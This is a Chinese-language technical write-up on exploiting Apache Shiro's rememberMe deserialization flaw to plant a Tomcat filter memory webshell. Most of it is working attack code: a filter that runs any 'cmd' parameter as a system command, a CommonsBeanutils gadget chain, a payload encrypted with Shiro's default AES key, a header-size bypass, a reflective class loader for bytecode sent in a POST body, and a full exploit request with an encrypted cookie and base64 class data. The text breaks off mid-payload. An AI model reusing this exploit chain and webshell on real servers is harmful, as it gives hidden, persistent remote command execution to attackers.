shiro反序列化注入内存马

shiro反序列化注入内存马

tomcat filter内存马

先写一个filter内存马

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<%
    final String name = "evil";
    ServletContext servletContext = request.getSession().getServletContext();

    Field appctx = servletContext.getClass().getDeclaredField("context");
    appctx.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);

    Field stdctx = applicationContext.getClass().getDeclaredField("context");
    stdctx.setAccessible(true);
    StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

    Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    Configs.setAccessible(true);
    Map filterConfigs = (Map) Configs.get(standardContext);

    if (filterConfigs.get(name) == null){
        Filter filter = new Filter() {
            @Override
            public void init(FilterConfig filterConfig) throws ServletException {

            }

            @Override
            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                System.out.println("Do Filter ......");
                String cmd;
                if ((cmd = servletRequest.getParameter("cmd")) != null) {
                    Process process = Runtime.getRuntime().exec(cmd);
                    java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
                            new java.io.InputStreamReader(process.getInputStream()));
                    StringBuilder stringBuilder = new StringBuilder();
                    String line;
                    while ((line = bufferedReader.readLine()) != null) {
                        stringBuilder.append(line + '\n');
                    }
                    servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
                    servletResponse.getOutputStream().flush();
                    servletResponse.getOutputStream().close();
                    return;
                }

                filterChain.doFilter(servletRequest,servletResponse);
                System.out.println("doFilter");
            }

            @Override
            public void destroy() {

            }

        };


        FilterDef filterDef = new FilterDef();
        filterDef.setFilter(filter);
        filterDef.setFilterName(name);
        filterDef.setFilterClass(filter.getClass().getName());
        /**
         * 将filterDef添加到filterDefs中
         */
        standardContext.addFilterDef(filterDef);

        FilterMap filterMap = new FilterMap();
        filterMap.addURLPattern("/*");
        filterMap.setFilterName(name);
        filterMap.setDispatcher(DispatcherType.REQUEST.name());

        standardContext.addFilterMapBefore(filterMap);

        Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,FilterDef.class);
        constructor.setAccessible(true);
        ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext,filterDef);

        filterConfigs.put(name,filterConfig);
    }
%>

构造恶意类

将内存马逻辑写入恶意类static关键字,再通过TemplatesImpl动态加载字节码从而注册filter

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
public class BehinderFilter extends AbstractTranslet implements Filter {
    static {
        try {
            final String name = "evil";
            final String URLPattern = "/*";

            WebappClassLoaderBase webappClassLoaderBase =
                    (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

            Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
            Configs.setAccessible(true);
            Map filterConfigs = (Map) Configs.get(standardContext);

            BehinderFilter behinderFilter = new BehinderFilter();

            FilterDef filterDef = new FilterDef();
            filterDef.setFilter(behinderFilter);
            filterDef.setFilterName(name);
            filterDef.setFilterClass(behinderFilter.getClass().getName());
            /**
             * 将filterDef添加到filterDefs中
             */
            standardContext.addFilterDef(filterDef);

            FilterMap filterMap = new FilterMap();
            filterMap.addURLPattern(URLPattern);
            filterMap.setFilterName(name);
            filterMap.setDispatcher(DispatcherType.REQUEST.name());

            standardContext.addFilterMapBefore(filterMap);

            Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
            constructor.setAccessible(true);
            ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);

            filterConfigs.put(name, filterConfig);
        } catch (NoSuchFieldException ex) {
            ex.printStackTrace();
        } catch (InvocationTargetException ex) {
            ex.printStackTrace();
        } catch (IllegalAccessException ex) {
            ex.printStackTrace();
        } catch (NoSuchMethodException ex) {
            ex.printStackTrace();
        } catch (InstantiationException ex) {
            ex.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {

    }

    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        System.out.println("Do Filter ......");
        String cmd;
        if ((cmd = servletRequest.getParameter("cmd")) != null) {
            Process process = Runtime.getRuntime().exec(cmd);
            java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
                    new java.io.InputStreamReader(process.getInputStream()));
            StringBuilder stringBuilder = new StringBuilder();
            String line;
            while ((line = bufferedReader.readLine()) != null) {
                stringBuilder.append(line + '\n');
            }
            servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
            servletResponse.getOutputStream().flush();
            servletResponse.getOutputStream().close();
            return;
        }

        filterChain.doFilter(servletRequest, servletResponse);
        System.out.println("doFilter");
    }

    @Override
    public void destroy() {

    }
}

加密序列化恶意类

获取恶意类字节码,使用cb链进行动态类加载

cb链

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
public class CommonsBeanutils1Shiro {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public byte[] getPayload(byte[] clazzBytes) throws Exception {
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        queue.add("1");
        queue.add("1");

        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});

        // ==================
        // 生成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

        return barr.toByteArray();
        //返回一个序列化后的 byte[] 字节数组
    }
}

加密cb链序列化文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
public class Client_memshell {
    public static void main(String[] args) throws Exception {
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(com.govuln.shiroattack.memshell.BehinderFilter.class.getName());

        byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());

        AesCipherService aes = new AesCipherService();
        byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");

        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.printf(ciphertext.toString());
    }
}

clazz.toBytecode() 就不需要先手动编译成 .class 文件,直接在运行时拿到该类的 原始字节码。

注入

image-20250822231324078

恶意序列化文件成功注入,并在反序列化时动态加载并初始化了恶意类,注册恶意filter

image-20250822231453354

绕过maxHttpHeaderSize

使用shiro反序列化修改 maxHttpHeaderSize的大小

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
public class TomcatHeaderSize extends AbstractTranslet {

    static {
        try {
            java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
            java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
            java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
            java.lang.reflect.Field headerSizeField = org.apache.coyote.http11.Http11InputBuffer.class.getDeclaredField("headerBufferSize");
            java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null);
            contextField.setAccessible(true);
            headerSizeField.setAccessible(true);
            serviceField.setAccessible(true);
            requestField.setAccessible(true);
            getHandlerMethod.setAccessible(true);
            org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
                    (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
            org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
            org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();
            for (int i = 0; i < connectors.length; i++) {
                if (4 == connectors[i].getScheme().length()) {
                    org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
                    if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {
                        Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();
                        for (int j = 0; j < classes.length; j++) {
                            // org.apache.coyote.AbstractProtocol$ConnectionHandler
                            if (52 == (classes[j].getName().length()) || 60 == (classes[j].getName().length())) {
                                java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");
                                java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
                                globalField.setAccessible(true);
                                processorsField.setAccessible(true);
                                org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler, null));
                                java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
                                for (int k = 0; k < list.size(); k++) {
                                    org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));
                                    // 10000 为修改后的 headersize
                                    headerSizeField.set(tempRequest.getInputBuffer(),100000);
                                }
                            }
                        }
                        // 10000 为修改后的 headersize
                        ((org.apache.coyote.http11.AbstractHttp11Protocol) protocolHandler).setMaxHttpHeaderSize(100000);
                    }
                }
            }
        } catch (Exception e) {
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

将其用cb链注入并执行,成功修改maxHttpHeaderSize

从POST请求体中发送字节码数据

这种方法的原理:在反序列化中动态加载类 。

利用反序列化加载一个类的加载器ClassLoader 将出入进来的代码动态加载执行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
public class MyClassLoader extends AbstractTranslet {
    static{
        try{
            javax.servlet.http.HttpServletRequest request = ((org.springframework.web.context.request.ServletRequestAttributes)org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest();
            java.lang.reflect.Field r=request.getClass().getDeclaredField("request");
            r.setAccessible(true);
            org.apache.catalina.connector.Response response =((org.apache.catalina.connector.Request) r.get(request)).getResponse();
            javax.servlet.http.HttpSession session = request.getSession();

            String classData=request.getParameter("classData");

            byte[] classBytes = new sun.misc.BASE64Decoder().decodeBuffer(classData);
            java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass",new Class[]{byte[].class, int.class, int.class});
            defineClassMethod.setAccessible(true);
            Class cc = (Class) defineClassMethod.invoke(MyClassLoader.class.getClassLoader(), classBytes, 0,classBytes.length);
            cc.newInstance().equals(new Object[]{request,response,session});
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    @Override
    public void transform(DOM arg0, SerializationHandler[] arg1) throws TransletException {
    }
    @Override
    public void transform(DOM arg0, DTMAxisIterator arg1, SerializationHandler arg2) throws TransletException {
    }
}

如下命令得到class文件BehinderFilter.class的base64

1
cat BehinderFilter.class|base64 |sed ':label;N;s/\n//;b label'

rememberMe中放入通过shiro的AES+Base64加密MyClassLoader.java拿到加密后的数据,classData传输BehinderFilter.class的base64,要记得进行一次url编码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /shirodemo_war/ HTTP/1.1
Host: localhost:8081
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Referer: http://localhost:8081/shirodemo_war/login.jsp
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: rememberMe=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
Content-Type: application/x-www-form-urlencoded
Content-Length: 10610

classData=yv66vgAAADQBewoAYgDECQDFAMYIAMcKAMgAyQcAygcAywsABQDMBwDNCgAIAMQIAIkKAAgAzggAiwgAjQsABQDPCADQCgDRANIIANMIANQLANUA1ggA1woA2ADZBwDaCgDRANsKABYA3AoA2ADdCADeCgAdAN8IAOAHAOEHAIYJAOIA4woAHQDkCgDlAOYHAOcKACIAxAsABQDoCgDpAOoKACIA6woA2ADsCgAqAO0KAB0A7gcA7woA4gDwCgDlAPEKAB0A8goAKgDSBwDzCgAvAPQLAPUA9ggAfQgA9wgA+AoA+QD6CgD5APsHAPwKADcA/QsA/gD/BwEACgAdAQEIAKcKAB0BAgoBAwDmCgEDAQQHAQUHAQYKAEEAxAcBBwoAQwDECgBDAQgKAEMBCQoAHQEKCgBDAQsKADoBDAcBDQoASgDECgBKAQ4KAEoBCQkBDwEQCgEPAREKAEoBEgoAOgETBwEUBwEVCgAdARYKARcA5goBFwEYCwBAAM4HARkKAFgA9AcBGgoAWgD0BwEbCgBcAPQHARwKAF4A9AcBHQoAYAD0BwEeBwEfAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBADBMY29tL2dvdnVsbi9zaGlyb2F0dGFjay9tZW1zaGVsbC9CZWhpbmRlckZpbHRlcjsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcBIAEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAAxmaWx0ZXJDb25maWcBABxMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7BwEhAQAIZG9GaWx0ZXIBAFsoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOylWAQABawEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAWMBABVMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAZtZXRob2QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADmV2aWxjbGFzc19ieXRlAQACW0IBAAlldmlsY2xhc3MBABFMamF2YS9sYW5nL0NsYXNzOwEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdzZXNzaW9uAQAgTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsBAAtwYWdlQ29udGV4dAEAE0xqYXZhL3V0aWwvSGFzaE1hcDsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAOc2VydmxldFJlcXVlc3QBAB5MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAA9zZXJ2bGV0UmVzcG9uc2UBAB9MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQALZmlsdGVyQ2hhaW4BABtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjsBAA1TdGFja01hcFRhYmxlBwDzBwEiAQAHZGVzdHJveQEACDxjbGluaXQ+AQAEbmFtZQEAClVSTFBhdHRlcm4BABV3ZWJhcHBDbGFzc0xvYWRlckJhc2UBADJMb3JnL2FwYWNoZS9jYXRhbGluYS9sb2FkZXIvV2ViYXBwQ2xhc3NMb2FkZXJCYXNlOwEAD3N0YW5kYXJkQ29udGV4dAEAKkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0OwEABmFDbGFzcwEAB0NvbmZpZ3MBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANZmlsdGVyQ29uZmlncwEAD0xqYXZhL3V0aWwvTWFwOwEADmJlaGluZGVyRmlsdGVyAQAJZmlsdGVyRGVmAQAxTG9yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvc